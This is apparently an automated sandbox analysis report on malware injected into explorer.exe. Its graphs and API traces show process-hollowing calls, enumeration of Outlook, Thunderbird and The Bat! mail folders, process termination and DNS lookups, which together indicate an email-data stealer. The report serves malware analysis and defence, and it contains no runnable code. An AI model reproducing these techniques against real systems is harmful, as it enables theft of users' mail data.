87->23 88 Function_000614F9

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 107 638b0-63907 call 61ad4 call 61838 NtUnmapViewOfSection call 6388c 116 63911-6391a 107->116 117 63909-6390c call 638b0 107->117 117->116
                                  APIs
                                  • NtUnmapViewOfSection.NTDLL ref: 000638F2
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.519677365.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_61000_explorer.jbxd
                                  Similarity
                                  • API ID: SectionUnmapView
                                  • String ID:
                                  • API String ID: 498011366-0
                                  • Opcode ID: 175f204f98ddab081ce75ab585c860cf335b3b36596ebe57e2ab61619d8d81c0
                                  • Instruction ID: 07d7c0bebfd5eab35338b42f632c169550439883b7608d4425e9f1fe2b024cbe
                                  • Opcode Fuzzy Hash: 175f204f98ddab081ce75ab585c860cf335b3b36596ebe57e2ab61619d8d81c0
                                  • Instruction Fuzzy Hash: F3F0A020F11A080FEAAC77FD685D3A822C2EB59310F900629B516C36D3DC398A458352

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.519677365.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_61000_explorer.jbxd
                                  Similarity
                                  • API ID: CloseEnumOpen
                                  • String ID:
                                  • API String ID: 1332880857-0
                                  • Opcode ID: e6d0cc022632efdd4a3c5a8daf3e56bcebce22f91e00e29876c625ce24938a9c
                                  • Instruction ID: d4483960c43caaeea037d42a9e10a4b875f7596f5693c41f599e3ec46e3d9013
                                  • Opcode Fuzzy Hash: e6d0cc022632efdd4a3c5a8daf3e56bcebce22f91e00e29876c625ce24938a9c
                                  • Instruction Fuzzy Hash: 82416C30718F0C4FDB98EF6D94997AAB6E2FBD8341F04456EA14EC3262DE34D9448782

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 41 6a298-6a29b 42 6a2a5-6a2a9 41->42 43 6a2b5 42->43 44 6a2ab-6a2b3 42->44 45 6a2b7 43->45 46 6a29d-6a2a3 43->46 44->43 47 6a2ba-6a2c1 45->47 46->42 49 6a2c3-6a2cb 47->49 50 6a2cd 47->50 49->50 50->47 51 6a2cf-6a2d2 50->51 52 6a2e7-6a2f4 51->52 53 6a2d4-6a2e2 51->53 63 6a2f6-6a2f8 52->63 64 6a30e-6a31c call 6a25a 52->64 54 6a2e4-6a2e5 53->54 55 6a31e-6a339 53->55 54->52 57 6a36a-6a36d 55->57 58 6a372-6a379 57->58 59 6a36f-6a370 57->59 62 6a37f-6a383 58->62 61 6a351-6a355 59->61 65 6a357-6a35a 61->65 66 6a33b-6a33e 61->66 67 6a385-6a39e LoadLibraryA 62->67 68 6a3e0-6a3e9 62->68 69 6a2fb-6a302 63->69 64->42 65->58 70 6a35c-6a360 65->70 66->58 74 6a340 66->74 73 6a39f-6a3a6 67->73 71 6a3ec-6a3f5 68->71 90 6a304-6a30a 69->90 91 6a30c 69->91 75 6a341-6a345 70->75 76 6a362-6a369 70->76 77 6a3f7-6a3f9 71->77 78 6a41a-6a46a VirtualProtect * 2 71->78 73->62 80 6a3a8 73->80 74->75 75->61 81 6a347-6a349 75->81 76->57 83 6a40c-6a418 77->83 84 6a3fb-6a40a 77->84 85 6a46e-6a473 78->85 86 6a3b4-6a3bc 80->86 87 6a3aa-6a3b2 80->87 81->61 89 6a34b-6a34f 81->89 83->84 84->71 85->85 92 6a475-6a484 85->92 88 6a3be-6a3ca 86->88 87->88 95 6a3d5-6a3df 88->95 96 6a3cc-6a3d3 88->96 89->61 89->65 90->91 91->64 91->69 96->73
                                  APIs
                                  • LoadLibraryA.KERNEL32 ref: 0006A397
                                  • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0006A441
                                  • VirtualProtect.KERNELBASE ref: 0006A45F
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.519677365.0000000000069000.00000040.80000000.00040000.00000000.sdmp, Offset: 00069000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_69000_explorer.jbxd
                                  Similarity
                                  • API ID: ProtectVirtual$LibraryLoad
                                  • String ID:
                                  • API String ID: 895956442-0
                                  • Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                  • Instruction ID: 006bc09559ba58e1e56ca86166064d69eaa2f5b492dea585316237ca25ff1824
                                  • Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                  • Instruction Fuzzy Hash: 99517D3175892E4BCB24BB7C9CC42F5B3C3F757321B18062AD08AD3385D559D9468B93

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 97 6372c-637ba call 61838 RegCreateKeyExW 101 637d6-637f0 call 61860 97->101 102 637bc-637cb 97->102 102->101 106 637cd-637d3 102->106 106->101
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.519677365.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_61000_explorer.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID: ?
                                  • API String ID: 2289755597-1684325040
                                  • Opcode ID: 90b71b727ca288489aec266a13dd0a18d59c7ad321cf10e681fca41da4c5c652
                                  • Instruction ID: 0175cadc1eaba084e880b185854f7669454e214051596b44bd1488a6f786bdce
                                  • Opcode Fuzzy Hash: 90b71b727ca288489aec266a13dd0a18d59c7ad321cf10e681fca41da4c5c652
                                  • Instruction Fuzzy Hash: 9E11B970608B4C8FD750DF69D48865AB7E2FB98305F40062EE489C3321DF34D985CB82

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 119 622b4-622c6 120 622d6-622e6 119->120 121 622c8-622d0 CreateStreamOnHGlobal 119->121 121->120
                                  APIs
                                  • CreateStreamOnHGlobal.OLE32 ref: 000622D0
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.519677365.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_61000_explorer.jbxd
                                  Similarity
                                  • API ID: CreateGlobalStream
                                  • String ID:
                                  • API String ID: 2244384528-0
                                  • Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                  • Instruction ID: 6c511f69b69d8d3de49810070f3f7e1f5989998c8ca95c8496505d4ba7d4b445
                                  • Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                  • Instruction Fuzzy Hash: 7AE08C30108B0A8FD798AFBCE4CA07933A1EB9C252B05093EE005CB114D27988C18741

                                  Execution Graph

                                  Execution Coverage:15.3%
                                  Dynamic/Decrypted Code Coverage:96.6%
                                  Signature Coverage:0%
                                  Total number of Nodes:233
                                  Total number of Limit Nodes:7
                                  execution_graph 1119 826ac lstrlen 1120 826f3 1119->1120 1121 826c4 CryptBinaryToStringA 1119->1121 1121->1120 1122 826d7 1121->1122 1125 829b7 GetProcessHeap RtlAllocateHeap 1122->1125 1124 826e2 CryptBinaryToStringA 1124->1120 1125->1124 1126 8295c VirtualFree 898 8126e CreateFileW 899 816fb Sleep 898->899 900 8129e GetFileSize 898->900 901 816f3 CloseHandle 900->901 902 812b6 900->902 901->899 902->901 916 829b7 GetProcessHeap RtlAllocateHeap 902->916 904 812cd 905 812db ReadFile 904->905 906 816f2 904->906 910 812fe 905->910 906->901 907 816eb 917 82999 907->917 908 81329 SetFilePointer 908->907 915 81351 908->915 910->907 910->908 911 81374 RtlMoveMemory 911->915 912 813a3 ReadFile 912->915 913 81c39 26 API calls 913->915 914 81972 29 API calls 914->915 915->907 915->911 915->912 915->913 915->914 916->904 922 827e2 VirtualQuery 917->922 920 829b5 920->906 921 829a5 GetProcessHeap HeapFree 921->920 923 827f9 922->923 923->920 923->921 924 8118f 925 81192 924->925 932 8255c 925->932 928 8255c 16 API calls 929 811b9 928->929 930 8255c 16 API calls 929->930 931 811c6 930->931 947 829b7 GetProcessHeap RtlAllocateHeap 932->947 934 8257a lstrcatW PathAppendW 935 8265d 934->935 936 825a2 FindFirstFileW 934->936 938 82999 3 API calls 935->938 936->935 937 825b9 936->937 939 825bd RtlZeroMemory 937->939 941 8263e FindNextFileW 937->941 942 8260f lstrcatW PathAppendW 937->942 945 825df lstrcatW PathAppendW 937->945 946 8255c 5 API calls 937->946 940 811ac 938->940 939->937 940->928 941->939 944 82652 FindClose 941->944 942->941 943 82627 StrStrIW 942->943 943->937 943->941 944->935 945->937 945->941 946->937 947->934 948 81000 949 81010 948->949 950 81007 948->950 952 81016 950->952 953 827e2 VirtualQuery 952->953 955 8101e 953->955 954 81022 954->949 955->954 960 829b7 GetProcessHeap RtlAllocateHeap 955->960 957 8102e RtlMoveMemory NtUnmapViewOfSection 961 8104f 957->961 960->957 1000 829b7 GetProcessHeap RtlAllocateHeap 961->1000 963 8105c 1001 829b7 GetProcessHeap RtlAllocateHeap 963->1001 965 8106b ExpandEnvironmentStringsW 966 8108c ExpandEnvironmentStringsW 965->966 967 81085 965->967 969 81099 966->969 970 810a0 ExpandEnvironmentStringsW 966->970 1002 8123a 967->1002 971 8123a 24 API calls 969->971 972 810ad 970->972 973 810b4 SHGetSpecialFolderPathW 970->973 971->970 974 8123a 24 API calls 972->974 975 810cc ExpandEnvironmentStringsW 973->975 976 810c5 973->976 974->973 978 810d9 975->978 979 810e0 ExpandEnvironmentStringsW 975->979 977 8123a 24 API calls 976->977 977->975 1009 811cc 978->1009 981 810ed 979->981 982 810f4 ExpandEnvironmentStringsW 979->982 1024 81192 981->1024 984 81108 ExpandEnvironmentStringsW 982->984 985 81101 982->985 987 8111c ExpandEnvironmentStringsW 984->987 988 81115 984->988 986 81192 16 API calls 985->986 986->984 990 81129 987->990 991 81130 987->991 989 81192 16 API calls 988->989 989->987 993 81192 16 API calls 990->993 992 82999 3 API calls 991->992 994 81137 992->994 993->991 995 81187 ExitProcess 994->995 1031 829b7 GetProcessHeap RtlAllocateHeap 994->1031 997 8114e 998 8117f 997->998 999 81158 wsprintfA 997->999 998->995 999->998 999->999 1000->963 1001->965 1032 8274a CreateToolhelp32Snapshot 1002->1032 1005 8255c 16 API calls 1006 8125b 1005->1006 1007 8255c 16 API calls 1006->1007 1008 81268 1007->1008 1008->966 1010 8255c 16 API calls 1009->1010 1011 811e6 1010->1011 1012 8255c 16 API calls 1011->1012 1013 811f3 1012->1013 1014 8255c 16 API calls 1013->1014 1015 81200 1014->1015 1016 8255c 16 API calls 1015->1016 1017 8120d 1016->1017 1018 8255c 16 API calls 1017->1018 1019 8121a 1018->1019 1020 8255c 16 API calls 1019->1020 1021 81227 1020->1021 1022 8255c 16 API calls 1021->1022 1023 81234 1022->1023 1023->979 1025 8255c 16 API calls 1024->1025 1026 811ac 1025->1026 1027 8255c 16 API calls 1026->1027 1028 811b9 1027->1028 1029 8255c 16 API calls 1028->1029 1030 811c6 1029->1030 1030->982 1031->997 1033 81249 1032->1033 1034 82765 Process32First 1032->1034 1033->1005 1035 827ae 1034->1035 1036 8277f lstrcmpi 1035->1036 1037 827b2 CloseHandle 1035->1037 1038 827a0 Process32Next 1036->1038 1039 82795 1036->1039 1037->1033 1038->1035 1041 827be OpenProcess 1039->1041 1042 827e0 1041->1042 1043 827d0 TerminateProcess CloseHandle 1041->1043 1042->1038 1043->1042 1048 82013 1049 82029 lstrlen 1048->1049 1050 82036 1048->1050 1049->1050 1059 829b7 GetProcessHeap RtlAllocateHeap 1050->1059 1052 8203e lstrcat 1053 8207a 1052->1053 1054 82073 lstrcat 1052->1054 1060 820a7 1053->1060 1054->1053 1057 82999 3 API calls 1058 8209d 1057->1058 1059->1052 1094 82415 1060->1094 1064 820d4 1099 82938 lstrlen MultiByteToWideChar 1064->1099 1066 820e3 1100 824cc RtlZeroMemory 1066->1100 1069 82135 RtlZeroMemory 1071 8216a 1069->1071 1070 82999 3 API calls 1072 8208a 1070->1072 1073 823f7 1071->1073 1077 82198 1071->1077 1102 8243d 1071->1102 1072->1057 1073->1070 1075 823dd 1075->1073 1076 82999 3 API calls 1075->1076 1076->1073 1077->1075 1111 829b7 GetProcessHeap RtlAllocateHeap 1077->1111 1079 82268 wsprintfW 1080 8228e 1079->1080 1084 822fb 1080->1084 1112 829b7 GetProcessHeap RtlAllocateHeap 1080->1112 1082 822c8 wsprintfW 1082->1084 1083 823ba 1085 82999 3 API calls 1083->1085 1084->1083 1113 829b7 GetProcessHeap RtlAllocateHeap 1084->1113 1087 823ce 1085->1087 1087->1075 1088 82999 3 API calls 1087->1088 1088->1075 1089 82346 1090 823b3 1089->1090 1114 8296b VirtualAlloc 1089->1114 1091 82999 3 API calls 1090->1091 1091->1083 1093 823a0 RtlMoveMemory 1093->1090 1095 820c6 1094->1095 1096 8241f 1094->1096 1098 829b7 GetProcessHeap RtlAllocateHeap 1095->1098 1115 82818 lstrlen lstrlen 1096->1115 1098->1064 1099->1066 1101 820f3 1100->1101 1101->1069 1101->1073 1103 824ab 1102->1103 1105 8244a 1102->1105 1103->1077 1104 8244e DnsQuery_W 1104->1105 1105->1103 1105->1104 1106 8248d DnsFree inet_ntoa 1105->1106 1106->1105 1107 824ad 1106->1107 1117 829b7 GetProcessHeap RtlAllocateHeap 1107->1117 1109 824b7 1118 82938 lstrlen MultiByteToWideChar 1109->1118 1111->1079 1112->1082 1113->1089 1114->1093 1116 82839 1115->1116 1116->1095 1117->1109 1118->1103 1044 89d24 1045 89caf 1044->1045 1046 89f00 VirtualProtect VirtualProtect 1045->1046 1047 89ec9 1045->1047 1046->1047 1047->1047 1127 818f4 CreateFileW 1128 81919 GetFileSize 1127->1128 1129 8196d 1127->1129 1130 81929 1128->1130 1131 81965 CloseHandle 1128->1131 1130->1131 1141 829b7 GetProcessHeap RtlAllocateHeap 1130->1141 1131->1129 1133 81936 ReadFile 1134 8194b 1133->1134 1135 8195d 1133->1135 1142 81c39 1134->1142 1136 82999 3 API calls 1135->1136 1138 81964 1136->1138 1138->1131 1141->1133 1155 829b7 GetProcessHeap RtlAllocateHeap 1142->1155 1144 81c50 RtlMoveMemory 1145 81e36 1144->1145 1149 81c65 1144->1149 1147 81db2 RtlMoveMemory RtlZeroMemory StrStrIA 1148 81deb StrStrIA 1147->1148 1147->1149 1148->1149 1150 81df7 StrStrIA 1148->1150 1149->1145 1151 82999 3 API calls 1149->1151 1156 829b7 GetProcessHeap RtlAllocateHeap 1149->1156 1157 81e44 1149->1157 1150->1149 1152 81e03 StrStrIA 1150->1152 1151->1149 1152->1149 1153 81e0f StrStrIA 1152->1153 1153->1149 1155->1144 1156->1147 1158 81e5b lstrlen CharLowerBuffA 1157->1158 1163 81ec7 1157->1163 1159 81e75 1158->1159 1161 81e9d 1158->1161 1160 81e7f lstrcmpi 1159->1160 1159->1161 1160->1159 1160->1163 1161->1163 1166 81ece StrStrIA 1161->1166 1163->1149 1165 82692 lstrlen RtlMoveMemory 1165->1163 1167 81ef5 RtlMoveMemory RtlMoveMemory StrStrIA 1166->1167 1168 81eb3 1166->1168 1167->1168 1169 81f37 StrStrIA 1167->1169 1168->1163 1168->1165 1169->1168 1170 81f4a StrStrIA 1169->1170 1170->1168 1171 81f5d lstrlen 1170->1171 1171->1168 1172 81f6a 1171->1172 1172->1168 1173 81f9b lstrlen 1172->1173 1173->1168 1173->1172 1174 89cf6 1176 89caf 1174->1176 1175 89ec9 1175->1175 1176->1174 1176->1175 1177 89f00 VirtualProtect VirtualProtect 1176->1177 1177->1175

                                  Callgraph

                                  • Executed
                                  • Not Executed
                                  • Opacity -> Relevance
                                  • Disassembly available
                                  callgraph 0 Function_00088F09 1 Function_0008170B 2 Function_0008490B 3 Function_0008380C 4 Function_00089B0E 5 Function_0008560F 6 Function_00081000 14 Function_00081016 6->14 7 Function_00082818 8 Function_00081810 9 Function_00084A10 10 Function_00082013 70 Function_00082999 10->70 82 Function_000820A7 10->82 89 Function_000829B7 10->89 11 Function_00082415 11->7 12 Function_00088816 13 Function_00088F16 35 Function_0008104F 14->35 14->89 106 Function_000827E2 14->106 15 Function_00082917 16 Function_00089028 17 Function_0008892B 18 Function_00088E2C 19 Function_0008992D 20 Function_00089420 21 Function_00089823 22 Function_00082723 23 Function_00089D24 24 Function_00082938 25 Function_00081C39 39 Function_00081E44 25->39 25->70 25->89 110 Function_00081FFB 25->110 26 Function_0008123A 32 Function_0008274A 26->32 43 Function_0008255C 26->43 27 Function_0008493B 28 Function_0008243D 28->24 28->89 29 Function_0008373E 30 Function_00089635 31 Function_00088F36 86 Function_000827BE 32->86 33 Function_00088B4C 34 Function_0008374D 35->26 35->70 72 Function_00081192 35->72 35->89 91 Function_000811CC 35->91 36 Function_00088F40 37 Function_00089040 38 Function_00089543 93 Function_00081ECE 39->93 112 Function_000826FC 39->112 40 Function_00088D46 41 Function_00083547 42 Function_0008875C 43->22 43->43 43->70 43->89 44 Function_0008295C 45 Function_0008185C 46 Function_00088A5F 47 Function_00088A50 48 Function_00088D52 49 Function_00088756 50 Function_00089456 51 Function_00089057 52 Function_00089169 53 Function_0008296B 54 Function_0008946E 55 Function_0008126E 55->1 55->8 55->25 55->45 64 Function_00081972 55->64 55->70 55->89 102 Function_000818EA 55->102 56 Function_00088961 57 Function_00088D61 58 Function_00088862 59 Function_00088B62 60 Function_00083565 61 Function_00082866 62 Function_00084A7A 63 Function_0008967E 64->15 64->39 64->70 64->89 64->110 65 Function_00088E77 66 Function_0008118F 66->43 67 Function_00088681 68 Function_00089182 69 Function_00083685 70->106 71 Function_0008949B 72->43 73 Function_000892AB 74 Function_000826AC 74->89 75 Function_000890AD 76 Function_000889AE 77 Function_000838AE 78 Function_000886A0 79 Function_00088EA4 80 Function_000891A5 81 Function_000834A6 82->11 82->24 82->28 82->53 82->61 82->70 82->89 90 Function_000824CC 82->90 83 Function_000838A7 84 Function_000899B8 85 Function_000886BE 87 Function_000887B5 88 Function_000895B7 91->43 92 Function_000888CE 93->110 94 Function_00088FC0 95 Function_000896C2 96 Function_00088DDB 97 Function_000854DC 98 Function_00088ED6 99 Function_000848D6 100 Function_00084CD6 101 Function_000897E8 103 Function_000887EB 104 Function_000836E0 105 Function_000887E1 107 Function_000890E5 108 Function_000894E6 109 Function_00088DF9 111 Function_000896FC 113 Function_00088AFD 114 Function_00088CFE 115 Function_00084AF0 116 Function_000835F2 117 Function_000818F4 117->25 117->64 117->70 117->89 118 Function_000848F4 119 Function_00088CF5 120 Function_00089CF6

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                    • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                  • lstrcatW.KERNEL32(00000000), ref: 00082588
                                  • PathAppendW.SHLWAPI(00000000,*.*), ref: 00082594
                                  • FindFirstFileW.KERNELBASE(00000000,?,?,000818F4), ref: 000825A8
                                  • RtlZeroMemory.NTDLL(00000209,00000209), ref: 000825C3
                                  • lstrcatW.KERNEL32(00000209,?), ref: 000825E1
                                  • PathAppendW.SHLWAPI(00000209,?), ref: 000825ED
                                  • lstrcatW.KERNEL32(00000209,?), ref: 00082611
                                  • PathAppendW.SHLWAPI(00000209,?), ref: 0008261D
                                  • StrStrIW.SHLWAPI(00000209,?), ref: 0008262C
                                  • FindNextFileW.KERNELBASE(00000000,?,?,000818F4), ref: 00082644
                                  • FindClose.KERNEL32(00000000,?,000818F4), ref: 00082653
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.524113554.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: AppendFindPathlstrcat$FileHeap$AllocateCloseFirstMemoryNextProcessZero
                                  • String ID: *.*
                                  • API String ID: 1648349226-438819550
                                  • Opcode ID: f244eec9a02c202261c54c00ec9b413ed975cdb29ccbfba86f23e8cd56307f5a
                                  • Instruction ID: 9ab04f0758e8323f23007aef3f0b497425df495bdb796eec7b4485748527ddf8
                                  • Opcode Fuzzy Hash: f244eec9a02c202261c54c00ec9b413ed975cdb29ccbfba86f23e8cd56307f5a
                                  • Instruction Fuzzy Hash: C9217171204315AFE710BF209D589AFBBECFFC5B05F04051DFAD1A2251EB389A168B66

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 267 81016-81020 call 827e2 270 81022-81023 267->270 271 81024-81049 call 829b7 RtlMoveMemory NtUnmapViewOfSection call 8104f 267->271 275 8104e 271->275
                                  APIs
                                    • Part of subcall function 000827E2: VirtualQuery.KERNEL32(00000000,00000209,0000001C,00000209,00082664,?,000818F4), ref: 000827EF
                                  • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 0008103A
                                  • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00081043
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.524113554.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                  • String ID:
                                  • API String ID: 1675517319-0
                                  • Opcode ID: baec96bfdead2c76f9d40b549b314d090c8656c966da0cfbe969c1d0fccf5cf0
                                  • Instruction ID: 55d5dd33b2f901c1089b15beaab3eab97d09ece425fd31eaa01e34cb85dd0178
                                  • Opcode Fuzzy Hash: baec96bfdead2c76f9d40b549b314d090c8656c966da0cfbe969c1d0fccf5cf0
                                  • Instruction Fuzzy Hash: 23D05E31800260B7EA657774BC1E9CA2A8CBF45730B254251B6E5961D3C9794A818B71

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                    • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                  • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 0008107F
                                  • ExpandEnvironmentStringsW.KERNEL32(%LOCALAPPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 00081093
                                  • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\Microsoft\Outlook,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810A7
                                  • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000005,00000000), ref: 000810BB
                                  • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Thunderbird,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810D3
                                  • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\The Bat!,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810E7
                                  • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\The Bat!,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810FB
                                  • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\BatMail,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 0008110F
                                  • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\BatMail,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 00081123
                                  • wsprintfA.USER32 ref: 0008116B
                                  • ExitProcess.KERNEL32 ref: 00081189
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.524113554.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: EnvironmentExpandStrings$HeapProcess$AllocateExitFolderPathSpecialwsprintf
                                  • String ID: %ALLUSERSPROFILE%\BatMail$%ALLUSERSPROFILE%\Microsoft\Outlook$%ALLUSERSPROFILE%\The Bat!$%APPDATA%\BatMail$%APPDATA%\Microsoft\Outlook$%APPDATA%\The Bat!$%APPDATA%\Thunderbird$%LOCALAPPDATA%\Microsoft\Outlook$%s,
                                  • API String ID: 1709485025-1688604020
                                  • Opcode ID: 72968f9d89e6bc32a17a9400d13fd263b6a4988c16ccb6dcd1446170f9e16262
                                  • Instruction ID: 4a2ba61a2a61d2de802517fd4c21c0c34be2e32a5e302aa0719222a3359143be
                                  • Opcode Fuzzy Hash: 72968f9d89e6bc32a17a9400d13fd263b6a4988c16ccb6dcd1446170f9e16262
                                  • Instruction Fuzzy Hash: 7331937174022566EA5133654C1AFFF198DBF81FD4B050124F6C9DA2C3DE598E0387B6

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 65 8126e-81298 CreateFileW 66 816fb-81708 Sleep 65->66 67 8129e-812b0 GetFileSize 65->67 68 816f3-816fa CloseHandle 67->68 69 812b6-812bc 67->69 68->66 69->68 70 812c2-812d5 call 829b7 69->70 73 812db-812fc ReadFile 70->73 74 816f2 70->74 75 812fe-81301 73->75 76 8130f 73->76 74->68 77 816eb-816ed call 82999 75->77 78 81307-8130d 75->78 79 81315-8131b 76->79 77->74 78->79 80 81329-8134b SetFilePointer 79->80 81 8131d-8131f 79->81 80->77 84 81351-8135d 80->84 81->80 83 81321-81323 81->83 83->77 83->80 85 8136b-81372 84->85 86 8135f-81369 84->86 87 81374-8137f RtlMoveMemory 85->87 88 81381 85->88 86->87 89 81383-81394 87->89 88->89 90 8139d-813a1 89->90 91 81396-8139b 89->91 92 813a3-813db ReadFile 90->92 91->92 93 816db-816e5 92->93 94 813e1-813e9 92->94 93->77 93->84 95 813ef-813f7 94->95 96 81561-81569 94->96 97 816bc-816c9 95->97 98 813fd-81405 95->98 96->97 99 8156f-81577 96->99 97->94 101 816cf-816d7 97->101 98->97 100 8140b-81417 98->100 99->97 102 8157d-81589 99->102 103 81419-8141e 100->103 104 81420-81422 100->104 101->93 105 8158b-81590 102->105 106 81592-81594 102->106 103->104 104->97 107 81428-81441 call 818ea 104->107 105->106 106->97 108 8159a-815b3 call 818ea 106->108 113 816b8 107->113 115 81447-81458 call 8170b 107->115 108->113 114 815b9-815ca call 8170b 108->114 113->97 114->113 120 815d0-815d5 114->120 115->113 121 8145e-81468 115->121 120->113 122 815db-815ed 120->122 121->113 123 8146e-81480 121->123 124 815ff-81601 122->124 125 815ef-815fb call 8185c 122->125 126 81492-81494 123->126 127 81482-8148e call 8185c 123->127 132 81613-81619 124->132 133 81603-8160e call 81810 124->133 125->124 129 814a6-814ac 126->129 130 81496-814a1 call 81810 126->130 127->126 136 8154b-8155c call 81c39 129->136 137 814b2-814b9 129->137 130->129 140 8161f-81626 132->140 141 816a0-816ac call 81c39 132->141 133->132 154 816b1-816b3 call 81972 136->154 143 814bf-814c4 137->143 144 81542-81545 137->144 145 81628-8162d 140->145 146 8169b-8169e 140->146 141->154 150 814ca-814d3 143->150 151 814c6-814c8 143->151 144->113 144->136 152 8162f-81631 145->152 153 81633-8163c 145->153 146->113 146->141 150->113 156 814d9-814de 150->156 151->144 151->150 152->146 152->153 153->113 155 8163e-81643 153->155 154->113 155->113 158 81645-81652 155->158 156->113 159 814e4-814f1 156->159 160 81653-8166c 158->160 161 814f2-8150b 159->161 162 8166e-81671 160->162 163 8168f-81694 160->163 164 8150d-81510 161->164 165 8152e-81533 161->165 162->163 167 81673-8168b call 81c39 call 81972 162->167 163->160 168 81696 163->168 164->165 169 81512-8152a call 81c39 call 81972 164->169 165->161 166 81535-8153d 165->166 166->113 167->163 168->146 169->165
                                  APIs
                                  • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00081289
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 000812A1
                                  • CloseHandle.KERNELBASE(00000000), ref: 000816F4
                                    • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                    • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                  • ReadFile.KERNELBASE(00000000,00000000,00000400,?,00000000), ref: 000812E8
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0008132D
                                  • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 00081379
                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 000813B6
                                    • Part of subcall function 00081C39: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081C55
                                    • Part of subcall function 00081972: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081994
                                  • Sleep.KERNELBASE(00000064), ref: 000816FD
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.524113554.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: File$MemoryMove$HeapRead$AllocateCloseCreateHandlePointerProcessSizeSleep
                                  • String ID:
                                  • API String ID: 1032042679-0
                                  • Opcode ID: 61bc2f22d2100cfa5cada242e575fdd2c09bc464b337c3e81574e5df978ef6ef
